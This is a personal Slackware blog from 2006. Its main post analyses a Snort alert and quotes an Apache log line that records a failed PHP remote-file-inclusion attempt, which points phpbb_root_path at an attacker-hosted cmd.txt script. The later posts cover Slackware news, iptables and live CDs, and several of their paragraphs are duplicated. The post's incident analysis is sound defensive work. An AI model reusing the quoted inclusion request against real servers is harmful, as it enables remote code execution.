I've a server that is hosted by Linode.com at wigglit.ath.cx . It runs Slackware. Linode.com lets you install prepackaged images of various distributions. Its very stable and I run multiple services on this machine, buy mainly serve web pages.
I've IPTables implemented, along with Snort.
Today, I checked my Snort logs and saw the below:
[**] [1:2002:5] WEB-PHP remote include path [**]
[Classification: Web Application Attack] [Priority: 1]
04/25-04:08:55.986986 125.243.112.130:57953 -> 66.160.141.30:80
TCP TTL:52 TOS:0x0 ID:10968 IpLen:20 DgmLen:680 DF
***AP*** Seq: 0x80425805 Ack: 0xC7958537 Win: 0x16D0 TcpLen: 32
TCP Options (3) => NOP NOP TS: 1905554218 12987212
I could have checked the actual payload of this specific event but I was a bit lazy and decided to check the web logs instead. I'm seasoned enough as a security analyst to know that this was probably the typical attack on php-based services running on a webserver, but I wanted to see what actually happened to trigger this event, so I went to my web logs and grepped for the IP:
root@starchild:/var/log/apache# cat access_log | grep '125.243.112.130'
125.243.112.130 - - [25/Apr/2006:04:08:55 -0400] "GET /slackware_botlogs/modules/PNphpBB2/includes/functions_admin.php
?phpbb_root_path=http://www.linuxsystems.go.ro/cmd.txt?&cmd HTTP/1.0" 404 333
I know this attack wasn't successful for two reasons:
1. I don't have PHP on this server.
2. I don't have a PHP-based content management system installed.
3. I observed a '404' within that log entry.
This attack was most likely either a worm (lupper or lupper-based) or someone that wasn't quite smart enough to know that I wasn't running php-based services. It/he/she was attempting to get into the administrative interface and possibly deface the website.
I wget'd the below from http://www.linuxsystems.go.ro/cmd.txt, which is what the attacker tried to apparently upload to my machine:
[I'll add the content when I can figure out how to add the code without blogger.com attempting to process it...and besides, I'm at work now.]
This is nasty stuff here, if your machine isn't hardened.
Tuesday, April 25, 2006
Wednesday, March 29, 2006
Slackware v11.0 Preorder
Slackware is offering Slackware v11.0 for preorder. This probably means that v11.0 will be released to the public soon. I'm still running a version of Slackware-current that is a few months out-of-date, but my goal is to update to the latest soon, so I can be as current as possible for v11.0 (not that it makes a real difference).
Also, for those of you that don't update your Slackware installation much, you need to become familiar with this page: Slackware's Security Advisiories.
Lastly, for you guys and gals who want to run firewalls on your machines, I've finally put got IPTABLES running on Wigglit.ath.cx, using Arno's Firewall Script. This script is very intuitive and you can customize it to your server's needs. I highly recommend at least giving the script a try.
Also, for those of you that don't update your Slackware installation much, you need to become familiar with this page: Slackware's Security Advisiories.
Lastly, for you guys and gals who want to run firewalls on your machines, I've finally put got IPTABLES running on Wigglit.ath.cx, using Arno's Firewall Script. This script is very intuitive and you can customize it to your server's needs. I highly recommend at least giving the script a try.
Sunday, May 22, 2005
Goblinx
There's an obscure (not well known) Slackware-based live-CD called Goblinx that may be of interest to a few. I've not tried this distribution yet, but will soon.
I'm interested in how it compares to Slax. I've used Slax off and on and even a few times at work as a rescue CD. There's also a security-oriented version (formerly Whoppix) called Whax (http://iwhax.net/): Whoppix was based off of Knoppix and Whax is based off of Slax, which is based off of Slackware...they are the same authors who developed Whoppix, but changed the distribution of use and the name of their product.
If anyone has tried both of these, I'm interested in a comparison of both and a listing of their pros and cons when in relation to each other.
Lastly, there's also Stratux. For more info (there's nothing but a torrent file on it's site), visit ##slackware or #stratux on irc.freenode.net.
I'm interested in how it compares to Slax. I've used Slax off and on and even a few times at work as a rescue CD. There's also a security-oriented version (formerly Whoppix) called Whax (http://iwhax.net/): Whoppix was based off of Knoppix and Whax is based off of Slax, which is based off of Slackware...they are the same authors who developed Whoppix, but changed the distribution of use and the name of their product.
If anyone has tried both of these, I'm interested in a comparison of both and a listing of their pros and cons when in relation to each other.
Lastly, there's also Stratux. For more info (there's nothing but a torrent file on it's site), visit ##slackware or #stratux on irc.freenode.net.
New Blog
Hi all. This is my 4th blog. I try to divide subject-matter by blog to make it easier to read my blog posts.
This blog will focus on the Slackware Linux distribution. I've also a Slackware Package blog and may attempt to consolidate that and this one in the future.
Anyways, enjoy!
This blog will focus on the Slackware Linux distribution. I've also a Slackware Package blog and may attempt to consolidate that and this one in the future.
Anyways, enjoy!
Subscribe to:
Comments (Atom)